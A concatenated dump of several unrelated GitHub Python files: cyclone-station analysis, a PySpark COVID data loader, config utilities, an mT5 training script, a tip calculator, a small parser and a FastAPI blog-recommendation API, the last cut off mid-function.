trackgdf = []\n for k, t in obstc.groupby('num'):\n segments = []\n for n in range(len(t.num) - 1):\n segment = LineString([[t.lon.iloc[n], t.lat.iloc[n]],\n [t.lon.iloc[n+1], t.lat.iloc[n+1]]])\n segments.append(segment)\n\n gdf = gpd.GeoDataFrame.from_records(t[:-1])\n gdf['geometry'] = segments\n gdf['category'] = pd.cut(gdf['pmin'],\n bins=[0, 930, 955, 970, 985, 990, 1020],\n labels=[5, 4, 3, 2, 1, 0])\n trackgdf.append(gdf)\n\n trackgdf = pd.concat(trackgdf)\n # WGS84 for IBTrACS - double check!\n trackgdf = trackgdf.set_crs(\"EPSG:4326\")\n return trackgdf\n\n\ndef load_stations(stationfile: str, dist: float) -> gpd.GeoDataFrame:\n \"\"\"\n Load weather station locations from a file, add geometry and a buffer to\n each feature.\n\n We put the station data into GDA 2020\n\n :param stationfile: Path to the station file\n :param dist: Buffer distance around each station - needs to be in the same\n units as the station coordinates (i.e. 
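# filter_tracks_domain above keeps a track when the LineString through its fixes
# intersects the lon/lat box. The geometric core as a minimal shapely sketch:
from shapely.geometry import LineString, box

domain = box(90, -40, 180, 0)                    # minlon, minlat, maxlon, maxlat
track = LineString([(150, -15), (152, -18), (155, -22)])
print(track.intersects(domain))                  # True: this track crosses the box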
probably degrees)\n \"\"\"\n logger.info(f\"Loading stations from {stationfile}\")\n colnames = [\"id\", 'stnNum', 'rainfalldist', 'stnName', 'stnOpen',\n 'stnClose', 'stnLat', 'stnLon', 'stnLoc', 'stnState',\n 'stnElev', 'stnBarmoeterElev', 'stnWMOIndex',\n 'stnDataStartYear', 'stnDataEndYear', 'pctComplete',\n 'pctY', 'pctN', 'pctW', 'pctS', 'pctI']\n\n df = pd.read_csv(stationfile, sep=',', index_col=False,\n names=colnames, keep_default_na=False,\n header=0)\n gdf = gpd.GeoDataFrame(df,\n geometry=gpd.points_from_xy(\n df.stnLon, df.stnLat,\n crs=\"EPSG:7844\").buffer(dist)\n )\n gdf.set_index('stnNum', drop=False, inplace=True)\n return gdf\n\n\ndef load_obs_data(stationFile: str, stnState: str) -> pd.DataFrame:\n \"\"\"\n Load observations for a given station\n\n :param str stationFile: path to a file containing formatted daily\n observations of the maximum wind gust and the corresponding present\n and past weather conditions\n :param str stnState: abbreviated state name for the station. Required\n to determine UTC offset (obs datetimes are local time, TC datetimes are\n UTC)\n\n :returns: `pd.DataFrame` containing the observations, with datetime\n converted to UTC. Any records with missing/null maximum daily gust values\n are eliminated.\n \"\"\"\n logger.info(f\"Loading {stationFile}\")\n colnames = [\"dc\", \"stnNum\", \"Year\", \"Month\", \"Day\",\n \"gust\", \"gust_q\", \"direction\", \"direction_q\", \"time\", \"time_q\",\n \"preswx00\", \"Qpreswx00\", \"preswx03\", \"Qpreswx03\", \"preswx06\", \"Qpreswx06\",\n \"preswx09\", \"Qpreswx09\", \"preswx12\", \"Qpreswx12\", \"preswx15\", \"Qpreswx15\",\n \"preswx18\", \"Qpreswx18\", \"preswx21\", \"Qpreswx21\", \"pastwx00\", \"Qpastwx00\",\n \"pastwx03\", \"Qpastwx03\", \"pastwx06\", \"Qpastwx06\", \"pastwx09\", \"Qpastwx09\",\n \"pastwx12\", \"Qpastwx12\", \"pastwx15\", \"Qpastwx15\", \"pastwx18\", \"Qpastwx18\",\n \"pastwx21\", \"Qpastwx21\", \"Null\"]\n\n dtypes = [str, str, str, str, str, float, str, float, str, str, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, ]\n df = pd.read_csv(stationFile, names=colnames, sep=\",\", index_col=False,\n header=0, parse_dates={'datetime': [2, 3, 4, 9]},\n na_values=['', ' '], keep_default_na=False)\n # Change local time to UTC time. Have to assume we're not working with\n # DLS times - would be somewhat complex to determine, since some states\n # actually went thru periods of having DLS, but typically don't!\n df['datetime'] = df.datetime - timedelta(hours=TZ[stnState])\n # Drop rows with no gust observation\n df = df[~df.gust.isna()]\n return df\n\n\ndef calculateCPA(stationFile: str, trackFile: str, trackFormat: str) -> pd.DataFrame:\n \"\"\"\n Calculate the closest point of approach to each station for each cyclone.\n\n NOTE: Currently also writes the data to a csv file at a hard-coded location\n\n :param str stationFile: Full path to the list of available stations\n :param str trackFile: Full path to the best track data\n :param str trackFormat: either \"raw\" or \"QC\". 
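# load_obs_data above shifts local standard time to UTC with a fixed per-state
# offset (DST deliberately ignored, as its comment notes). That step in
# isolation, with an abbreviated offset table:
from datetime import timedelta
import pandas as pd

TZ_HOURS = {"QLD": 10, "NSW": 10, "SA": 9.5, "WA": 8}

def obs_times_to_utc(local: pd.Series, stn_state: str) -> pd.Series:
    return local - timedelta(hours=TZ_HOURS[stn_state.strip()])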
Indicates which best track\n data to load\n\n :returns: `pd.DataFrame` with the datetime of each instance of a cyclone\n passage, along with distance, central pressure and poci of the storm at\n the time of CPA.\n \"\"\"\n tracks = load_obs_tracks(trackFile, trackFormat)\n stations = load_stations(stationFile, 2)\n stations.set_index('stnNum', drop=False, inplace=True)\n selected = gpd.overlay(tracks, stations.to_crs(\n tracks.crs), how='intersection')\n selected['cpa'] = selected.apply(lambda x: vincenty(\n (x['lat'], x['lon']), (x['stnLat'], x['stnLon'])), axis=1)\n # Closest point of approach (CPA)\n stncpa = selected.loc[selected.groupby(['stnNum', 'num']).cpa.idxmin()]\n stncpa = stncpa.loc[stncpa.cpa < 250.]\n stncpa.drop('geometry', axis=1, inplace=True)\n stncpa.to_csv(\n r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\\stncpa.csv\", index=False)\n return stncpa\n\n\ndef extractObs(cpadf: pd.DataFrame, stations: pd.DataFrame) -> pd.DataFrame:\n outdf = pd.DataFrame(columns=['stnNum', 'stnName', 'dtObs', 'gust', 'gustq',\n 'direction', 'dtTC', 'TCName', 'TCIDnum',\n 'TCCPA'])\n cpagroup = cpadf.groupby('stnNum')\n for stnNum, group in cpagroup:\n # Load the data - need the state to determine offset from UTC\n stnState = stations.loc[stnNum, 'stnState'].strip()\n stnName = stations.loc[stnNum, 'stnName']\n dataFile = os.path.join(\n stationPath, f\"DC02D_Data_{stnNum:06d}_999999999632559.txt\")\n obsData = load_obs_data(dataFile, stnState)\n if obsData.empty:\n print(f\"No station observation data for {stnNum}\")\n continue\n\n obsData.set_index('datetime', inplace=True, drop=False)\n for idx, tc in group.iterrows():\n # First find the index of the obs data closest to the time of CPA\n try:\n indx = obsData.index.get_loc(\n tc.datetime, method='nearest', tolerance=pd.Timedelta('1D'))\n except KeyError:\n print(\n f\"No obs within 1 day of {tc.datetime} at {stnNum} for {tc.NAME}\")\n continue\n\n # Redundant?\n if indx == -1:\n breakpoint()\n if indx == 0:\n # No records:\n continue\n\n # Select the records either side of the selected time - maximum wind\n # gust may have occured on previous or following day compared to the\n # time of CPA (e.g. 
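# extractObs above locates the observation nearest the CPA time with
# Index.get_loc(..., method='nearest', tolerance=...). That keyword was
# deprecated in pandas 1.4 and removed in 2.0; the equivalent on current pandas
# is get_indexer, which returns -1 when nothing lies within the tolerance:
import pandas as pd

idx = pd.date_range("2024-01-01", periods=4, freq="D")
target = pd.Timestamp("2024-01-02 09:00")
pos = idx.get_indexer([target], method="nearest", tolerance=pd.Timedelta("1D"))[0]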
CPA at 01:00, but highest gust at 23:00 previous\n # day)\n obsgrp = obsData.iloc[indx-1:indx+2]\n # Now take the max value of those records:\n obs = obsgrp.loc[obsgrp['gust'].idxmax()]\n\n if obs.gust is not None:\n print(stnNum, obs.datetime, obs.gust,\n obs.direction, tc.datetime, tc.NAME, tc.cpa)\n outdf = outdf.append(\n pd.DataFrame([[stnNum, stnName, obs.datetime, obs.gust, obs.gust_q, obs.direction, tc.datetime, tc.NAME, tc.num, tc.cpa]],\n columns=['stnNum', 'stnName', 'dtObs', 'gust', 'gustq', 'direction', 'dtTC', 'TCName', 'TCIDnum', 'TCCPA']),\n ignore_index=True)\n return outdf\n\n\nstationPath = r\"X:\\georisk\\HaRIA_B_Wind\\data\\raw\\from_bom\\2019\\Daily\"\nstationFile = os.path.join(stationPath, \"DC02D_StnDet_999999999632559.txt\")\ntrackFile = r\"X:\\georisk\\HaRIA_B_Wind\\data\\raw\\from_bom\\tc\\IDCKMSTM0S - 20210722.csv\"\n\nstncpa = calculateCPA(stationFile, trackFile, 'raw')\nstations = load_stations(stationFile, 2)\noutdf = extractObs(stncpa, stations)\ntdiff = abs(outdf.dtObs - outdf.dtTC)\n\n# Remove any obs where the time difference between CPA and the obs is greater than 36 hours\noutdf = outdf[tdiff < pd.Timedelta('36h')]\noutdf.to_csv(\n r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\\stncpa_obs.csv\", index=False)\n\n\nfor stnNum, obs in outdf.groupby('stnNum'):\n if len(obs) > 10:\n print(stnNum, stations.loc[stnNum, 'stnName'], len(obs))\n obs.to_csv(os.path.join(r\"X:\\georisk\\HaRIA_B_Wind\\data\\derived\\tcobs\", f\"tcobs_{stnNum:06d}.csv\"), index=False)\n\n\n","repo_name":"wcarthur/processing","sub_path":"extract/extract_TC_station_passage.py","file_name":"extract_TC_station_passage.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36031783741","text":"import requests, rarfile, json, warnings, io, time, os ,pandas as pd, shutil, stat\r\nfrom datetime import date\r\nfrom functools import reduce\r\nfrom pyspark.sql import SparkSession, DataFrame\r\n\r\nspark = SparkSession.builder.config(\"spark.driver.extraClassPath\", \"C:\\Spark\\mysql-connector-j-8.0.31.jar\").getOrCreate() #Iniciando a sessão Spark\r\n\r\n#Limpando o diretório, excluindo os CSV's do dia anterior para receber os novos do dia corrente \r\ndir1 = r\"G:\\Projetos_Python\\Spark\\csvs\"\r\nfor i in os.listdir(dir1):\r\n os.remove(os.path.join(dir1, i))\r\n\r\n#Minerando a URL principal para obter a URL dos arquivos do dia corrente\r\nurl = \"https://qd28tcd6b5.execute-api.sa-east-1.amazonaws.com/prod/PortalGeral\"\r\nhead = {\"X-Parse-Application-Id\": \"unAFkcaNDeXajurGB7LChj8SgQYS2ptm\"}\r\nreq = requests.get(url, headers=head)\r\nc_json = json.loads(req.content)\r\nurl2 = c_json[\"results\"][0][\"arquivo\"][\"url\"]\r\nm = url2[136:139]\r\n\r\n#Baixando os CSV's através da URL minerada, e extraindo para a pasta no diretório local\r\nwarnings.filterwarnings('ignore')\r\nresponse = requests.get(url2, verify = False, stream = True)\r\nfile = rarfile.RarFile(io.BytesIO(response.content))\r\nfile.extractall(r\"G:Projetos_Python\\Spark\\csvs\")\r\n\r\n#Listando os arquivos baixados para facilitar na hora de carregar os CSV's\r\ndir = os.listdir(r\"G:\\Projetos_Python\\Spark\\csvs\")\r\n\r\n#Carregando os CSV's já baixados e substituindo os valores N/A por \"Não Informado\" para facilitar no tratamento dos arquivos\r\ncsv20p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[0]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv20p2 = 
spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[1]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv21p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[2]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv21p2 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[3]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv22p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[4]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv22p2 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[5]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\ncsv23p1 = spark.read.csv(fr\"G:\\Projetos_Python\\Spark\\csvs\\{dir[6]}\", encoding='utf-8', sep=';', header=True).fillna(\"Não informado\")\r\n\r\n#Função para concatenar os DF's já excluindo as linhas que estão como \"Não informado\" na coluna \"codmun\", fiz esse tratamento para evitar informações desnecessárias\r\ndef unionAll(*dfs):\r\n return reduce(DataFrame.unionAll, dfs)\r\n\r\ndff = unionAll(csv20p1.filter(csv20p1.codmun != \"Não informado\"), csv20p2.filter(csv20p2.codmun != \"Não informado\"), csv21p1.filter(csv21p1.codmun != \"Não informado\"), csv21p2.filter(csv21p2.codmun != \"Não informado\")\r\n , csv22p1.filter(csv22p1.codmun != \"Não informado\"), csv22p2.filter(csv22p2.codmun != \"Não informado\"), csv23p1.filter(csv23p1.codmun != \"Não informado\"))\r\n\r\n#Ecluindo colunas desnecessárias\r\ndff = dff.drop(*(\"codRegiaoSaude\", \"nomeRegiaoSaude\", \"interior/metropolitana\",\"Recuperadosnovos\", \"emAcompanhamentoNovos\"))\r\n\r\n#Passando os dados do DF final já tratado para o BD passando como \"overwrite\" para sempre sobreescrever os dados antigos e ficar com os dados atualizados do dia\r\ndff.write.format('jdbc').options(url='jdbc:mysql://localhost:3306/covid_datasus',driver='com.mysql.jdbc.Driver',dbtable='covid',user='root',password='***').mode('overwrite').save()\r\n\r\n","repo_name":"adones15/Covid_Spark","sub_path":"projeto_spark_windows.py","file_name":"projeto_spark_windows.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34958425322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nfrom configparser import ConfigParser\n\nBASE_DIR = os.path.dirname(__file__)\n\n\ndef closest_cfg(filename='history.cfg', path='../', prevpath=None):\n \"\"\"\n return the path of the closest history.cfg file\n :param filename: default get file name\n :param path:\n :param prevpath:\n :return:\n \"\"\"\n if path == prevpath:\n return ''\n\n path = os.path.abspath(path)\n cfgfile = os.path.join(path, filename)\n if os.path.exists(cfgfile):\n return cfgfile\n return closest_cfg(os.path.dirname(path), path)\n\n\ndef get_config(filename='run.cfg', path=''):\n \"\"\"\n more about read: https://docs.python.org/3/library/configparser.html\n :param filename:\n :param path:\n :return:\n \"\"\"\n cfg = ConfigParser()\n path = os.path.join(BASE_DIR, path)\n cfg.read(closest_cfg(filename=filename, path=path))\n return cfg\n\n\nif __name__ == '__main__':\n cfg = get_config()\n print(cfg.get('mongodb', 'ORDER_COLLECTION'))\n","repo_name":"DavidLin3/order_cart","sub_path":"app/utils/conf_util.py","file_name":"conf_util.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
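# closest_cfg in the record above recurses toward the filesystem root until the
# path stops changing. An equivalent upward search sketched with pathlib:
from pathlib import Path
from typing import Optional

def find_upwards(filename: str, start: str = ".") -> Optional[Path]:
    here = Path(start).resolve()
    for folder in [here, *here.parents]:
        candidate = folder / filename
        if candidate.exists():
            return candidate
    return None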
+{"seq_id":"32752445092","text":"import os\n\n# Make Tensorflow less verbose\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom transformers import Seq2SeqTrainingArguments, Seq2SeqTrainer\nfrom transformers.trainer_utils import set_seed\n\nfrom datasets.utils import load_datasets\nfrom models.utils import load_model_and_tokenizer\nfrom metrics.rouge_score import RougeScore\n\nfrom utils import disable_tensorflow_gpu\nfrom utils.io import json_dump\n\n# Disable GPU for Tensorflow\ndisable_tensorflow_gpu()\n\n\ndef main(args):\n args.checkpoint_dir.mkdir(parents=True, exist_ok=True)\n json_dump(vars(args), args.checkpoint_dir / \"args.json\")\n\n set_seed(args.seed)\n\n model, tokenizer = load_model_and_tokenizer(\"models/mt5-small\")\n train_dataset, val_dataset = load_datasets(Path(\"dataset/\"), tokenizer=tokenizer)\n\n # val_dataset.size = 128\n\n training_args = Seq2SeqTrainingArguments(\n output_dir=args.checkpoint_dir,\n overwrite_output_dir=True,\n seed=args.seed,\n evaluation_strategy=\"steps\",\n fp16=args.fp16,\n num_train_epochs=args.num_epochs,\n adafactor=args.use_adafactor,\n learning_rate=args.learning_rate,\n weight_decay=args.weight_decay,\n per_device_train_batch_size=args.train_batch_size,\n per_device_eval_batch_size=args.eval_batch_size,\n gradient_accumulation_steps=args.gradient_accumulation_steps,\n predict_with_generate=True,\n dataloader_num_workers=args.num_workers,\n logging_steps=512 // args.train_batch_size,\n logging_dir=args.tb_log_dir,\n eval_steps=2048 // args.train_batch_size,\n save_steps=2048 // args.train_batch_size,\n )\n\n compute_metrics = None if not args.compute_rouge else RougeScore(tokenizer)\n\n trainer = Seq2SeqTrainer(\n model,\n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=val_dataset,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n )\n\n trainer.train()\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"--name\", default=\"TEST\")\n parser.add_argument(\"--checkpoint_dir\", type=Path)\n parser.add_argument(\"--tb_log_dir\", type=Path)\n\n parser.add_argument(\"--do_train\", action=\"store_true\")\n parser.add_argument(\"--do_eval\", action=\"store_true\")\n\n # Trainer\n parser.add_argument(\"--use_adafactor\", action=\"store_true\")\n parser.add_argument(\"--learning_rate\", type=float, default=5e-5)\n parser.add_argument(\"--weight_decay\", type=float, default=0)\n parser.add_argument(\"--num_epochs\", type=int, default=5)\n parser.add_argument(\"--train_batch_size\", type=int, default=2)\n parser.add_argument(\"--eval_batch_size\", type=int, default=4)\n parser.add_argument(\"--gradient_accumulation_steps\", type=int, default=8)\n parser.add_argument(\"--no_fp16\", dest=\"fp16\", action=\"store_false\")\n parser.add_argument(\"--no_compute_rouge\", dest=\"compute_rouge\", action=\"store_false\")\n\n parser.add_argument(\"--seed\", type=int, default=0x06902029)\n parser.add_argument(\"--num_workers\", type=int, default=4)\n\n args = parser.parse_args()\n\n if args.checkpoint_dir is None:\n args.checkpoint_dir = Path(\"checkpoints\") / args.name\n\n if args.tb_log_dir is None:\n args.tb_log_dir = Path(\"runs\") / (args.name + \"_\" + datetime.now().strftime(\"%m%d-%H%M\"))\n\n return args\n\n\nif __name__ == \"__main__\":\n 
main(parse_arguments())\n","repo_name":"jimpei8989/ADL-HW3","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26787410444","text":"##Your Life in Weeks Calculator\n\nname = input('what is your name?')\nage = input('what is your current age?')\n\nremaining_age = 90 - int(age)\n\ndays = int(remaining_age * 365)\nweeks = int(remaining_age * 52)\nmonths = int(remaining_age * 12)\n\nprint(f'{name},You have {days} days, {weeks} weeks, and {months} months left.')\n\n\n##Day_02 Tip Calculator\n\nprint('Welocme to the tip calculator')\ntotal_bill = float(input('what was the total bill? $\\n'))\ntip = int(input('what percentage tip would you like to give? 10, 12, or 15?\\n'))\npercentage_tip = (total_bill * tip) / 100\ntotal = float(total_bill + percentage_tip)\nspliting_bill = int(input('How many people to split the bill?'))\nprint(f\"Each person should pay: {total / spliting_bill}\")\n\n","repo_name":"MUSTAFAREZA47/Python","sub_path":"Learnig_Python/Day_02.py","file_name":"Day_02.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4767326487","text":"from tokenizer import Token\nfrom datatypes import linked_list\n\n__all__ = ['parse']\n\ndef parse(tokens):\n try:\n return match_exprs(tokens)\n except SystemExit:\n pass\n except KeyboardInterrupt:\n pass\n except Exception as e:\n raise\n\ndef match_exprs(tokens):\n out = []\n index = 0\n while index < len(tokens):\n match = match_expr(tokens[index:])\n try:\n out.append(match[0])\n index += match[1]\n except TypeError:\n raise SyntaxError(\"Syntax Error at line %s, %s...\"%(tokens[index][1], tokens[index][0]))\n return out\n\ndef match_expr(tokens):\n return match_literal(tokens) or match_compound(tokens)\n\ndef match_compound(tokens):\n out = []\n index = 1\n if tokens[0][0] is not Token.left_paren:\n return\n while True:\n head = tokens[index:]\n if not head:\n raise SyntaxError(\"EOF while scanning for closing parens\")\n if head[0][0] is Token.right_paren:\n return (linked_list(out), tokens[0][1]), index+1\n match = match_expr(head)\n if not match:\n raise SyntaxError(\"Syntax Error at line %s, %s...\"%(head[0][1], [x[0] for x in head[:5]]))\n out.append(match[0])\n index += match[1]\n\ndef match_literal(tokens):\n if not isinstance(tokens[0][0], Token):\n return tokens[0], 1\n\nif __name__ == '__main__':\n import tokenizer\n while True:\n print((parse(tokenizer.tokenize(raw_input('parser> ')))))\n","repo_name":"Joshua-Chin/jcli","sub_path":"parser_.py","file_name":"parser_.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3728833249","text":"import os.path\nfrom app import *\nfrom Recommend_Blogs import Using_Cosine_Similarity\n\n\n@app.get('/')\nasync def root():\n return {\"message\": \"Welcome to the Blog API Created by Yaksh Shah\"}\n\n\n@app.post('/register/name/{user_name}/email/{user_email}')\nasync def register_user(user_name: str, user_email: str):\n user_query = ''' insert into user_profile(user_name,user_email,user_pic)\n values(%s,%s,%s) '''\n user_info = (user_name, user_email, 'default_profile_pic.jpg')\n # execute the query\n cursor.execute(user_query, user_info)\n mydb.commit()\n return \"User Registeration Completed\"\n\n\n@app.get('/login/email/{user_email}')\nasync def 
user_login(user_email: str):\n cursor.execute(''' select user_id,user_name,user_email from user_profile \n where user_email=%s''',\n [user_email])\n resp = cursor.fetchone()\n if resp is not None:\n user_details = {'user_id': resp[0], 'user_name': resp[1], 'user_email': resp[2], \"user_res\": \"Found\"}\n update_user_rating(user_details['user_id'])\n return user_details\n else:\n return {\"user_res\": \"Not Found\"}\n\n\n@app.post('/update/name/{user_name}/id/{user_id}')\nasync def update_user_name(user_name: str, user_id: int):\n cursor.execute(\"\"\" update user_profile set user_name=%s where user_id=%s\"\"\",\n [user_name, user_id])\n # execute the query\n mydb.commit()\n return \"User Name Updated\"\n\n\n@app.post('/update/image/{user_pic}/id/{user_id}')\nasync def update_user_profile_pic(user_pic: str, user_id: int):\n cursor.execute(\"\"\" update user_profile set user_pic=%s where user_id=%s\"\"\",\n [user_pic, user_id])\n # execute the query\n mydb.commit()\n return \"User Profile Pic Updated\"\n\n\n@app.get('/name/{user_name}')\nasync def verify_user_name(user_name: str):\n cursor.execute(''' SELECT user_name from user_profile \n where user_name=%s''', [user_name])\n result = cursor.fetchone()\n if result:\n return \"unique\"\n else:\n return \"not unique\"\n return result\n\n\n@app.get('/image/id/{user_id}')\nasync def get_user_profile_pic(user_id: int):\n cursor.execute(\"\"\" select user_pic from user_profile where user_id=%s\"\"\", [user_id])\n resp = cursor.fetchone()\n user_img = {\"user_img\": resp[0]}\n return user_img\n\n\n@app.get('/blogs')\nasync def get_blogs_for_home_before_login():\n on_start()\n top_rated_blogs = ratings_df[ratings_df['ratings'] <= 3.5].value_counts().head(30000)\n top_blog_ids = list(set([x[0] for x in top_rated_blogs.index]))\n cursor.execute(f\"\"\" select * from blogs where blog_id in {tuple(top_blog_ids)} order by rand() limit 30\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/blogs/{user_id}')\nasync def get_blogs_for_home_after_login(user_id: int):\n blog_id_not_to_consider_tuple = get_blogs_not_to_consider(user_id)\n if blog_id_not_to_consider_tuple is not None:\n cursor.execute(f\"\"\" select * from blogs where blog_id order by rand() limit 30\"\"\")\n else:\n cursor.execute(\n f\"\"\" select * from blogs where blog_id not in {blog_id_not_to_consider_tuple} order by rand() limit 30\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/recommended/no/activity/blogs')\nasync def get_recommended_blogs_for_user_with_no_activity():\n top_rated_blogs = ratings_df[ratings_df['ratings'] > 3.5].value_counts().head(30000)\n top_blog_ids = list(set([x[0] for x in top_rated_blogs.index]))\n cursor.execute(f\"\"\" select * from blogs where blog_id in {tuple(top_blog_ids)} order by rand() limit 20\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n\n\n@app.get('/recommend/blogs/using/rbm/{user_id}')\nasync def get_recommended_blogs_using_rbm(user_id: int):\n path = os.path.abspath('Recommend_Blogs/RecommendedBlogs/top_k_reco.csv')\n top_reco_df = pd.read_csv(path)\n top_reco_list = top_reco_df[top_reco_df['userId'] == user_id]['blog_id'].values\n cursor.execute(f'select * from blogs where blog_id in {tuple(top_reco_list)}')\n blog_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blog_list)\n return 
blog_json\n\n@app.get('/recommend/similar/blogs/{user_id}')\nasync def get_recommended_blogs_using_cosine_similarity(user_id: int):\n cursor.execute('select * from ratings where user_id=%s', [user_id])\n ratings_list = cursor.fetchall()\n ratings_json = get_user_ratings_in_json_format(ratings_list)\n if len(ratings_json) < 3:\n return []\n else:\n blogs_json = []\n recommended_blogs = Using_Cosine_Similarity.get_similar_blog(blogs_json, ratings_json)\n recommended_blogs_json = get_blogs_for_recommendation(tuple(recommended_blogs))\n return recommended_blogs_json\n\n\n@app.get('/like/blogs/{user_id}')\nasync def get_liked_blogs(user_id: int):\n cursor.execute(\"\"\"select blog_id from likes where user_id=%s\"\"\", (user_id,))\n liked_blogs = cursor.fetchall()\n blog_id_tuple = ()\n blog_id_list = []\n blog_json = []\n blog_list = []\n if liked_blogs != []:\n for id in liked_blogs:\n blog_id_list.append(id[0])\n blog_id_tuple = tuple(blog_id_list)\n if len(blog_id_tuple) > 1:\n cursor.execute(f\"\"\" select * from blogs where blog_id in {blog_id_tuple}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n else:\n cursor.execute(f\"\"\" select * from blogs where blog_id={blog_id_tuple[0]}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n\n return blog_json\n else:\n return {\"res\": \"Not Found\"}\n\n\n@app.get('/favourites/blogs/{user_id}')\nasync def get_favourites_blogs(user_id: int):\n cursor.execute(\"select blog_id from favourites where user_id=%s\", (user_id,))\n favourites_blogs = cursor.fetchall()\n blog_id_tuple = ()\n blog_id_list = []\n if favourites_blogs != []:\n for id in favourites_blogs:\n blog_id_list.append(id[0])\n blog_id_tuple = tuple(blog_id_list)\n if len(blog_id_tuple) > 1:\n cursor.execute(f\"\"\" select * from blogs where blog_id in {blog_id_tuple}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n else:\n cursor.execute(f\"\"\" select * from blogs where blog_id={blog_id_tuple[0]}\"\"\")\n blogs_list = cursor.fetchall()\n blog_json = get_blogs_in_json_format(blogs_list)\n return blog_json\n else:\n return {\"res\": \"Not Found\"}\n\n\n@app.post('/content/seen/user/{user_id}/blog/{blog_id}')\nasync def seen_blog_content(user_id: int, blog_id: int):\n result = add_user_ratings(user_id, blog_id)\n return result\n\n\n@app.post('/likes/user/{user_id}/blog/{blog_id}')\nasync def like_blog(user_id: int, blog_id: int):\n cursor.execute(\"\"\"select * from likes where blog_id=%s and user_id=%s\"\"\", [blog_id, user_id])\n if cursor.fetchone():\n return \"Already exist\"\n else:\n curr_time = datetime.now(timezone(\"Asia/Kolkata\")).strftime('%Y-%m-%d %H:%M:%S')\n datetime_obj = datetime.strptime(curr_time, '%Y-%m-%d %H:%M:%S')\n cursor.execute(\"\"\"insert into likes(user_id,blog_id,date_created)values(%s,%s,%s)\"\"\",\n [user_id, blog_id, datetime_obj])\n mydb.commit()\n add_user_ratings(user_id, blog_id)\n return \"liked\"\n\n\n@app.delete('/deletelike/user/{user_id}/blog/{blog_id}')\nasync def unlike_blog(user_id: int, blog_id: int):\n cursor.execute(\"\"\" delete from likes where user_id=%s and blog_id=%s\"\"\", (user_id, blog_id))\n mydb.commit()\n return \"unliked\"\n\n\n@app.post('/favourites/user/{user_id}/blog/{blog_id}')\nasync def add_blog_to_favourites(user_id: int, blog_id: int):\n cursor.execute(\"\"\"select * from favourites where blog_id=%s and user_id=%s\"\"\", [blog_id, user_id])\n if cursor.fetchone():\n return \"Already exist\"\n 
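# Several endpoints above interpolate a Python tuple into "... blog_id in {t}"
# and must special-case one-element tuples, whose repr "(5,)" is not valid SQL.
# A placeholder-based sketch that handles any length and avoids SQL injection:
def select_blogs_in(cursor, blog_ids):
    placeholders = ",".join(["%s"] * len(blog_ids))  # "%s,%s,..." sized to the ids
    cursor.execute(f"select * from blogs where blog_id in ({placeholders})",
                   list(blog_ids))
    return cursor.fetchall()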
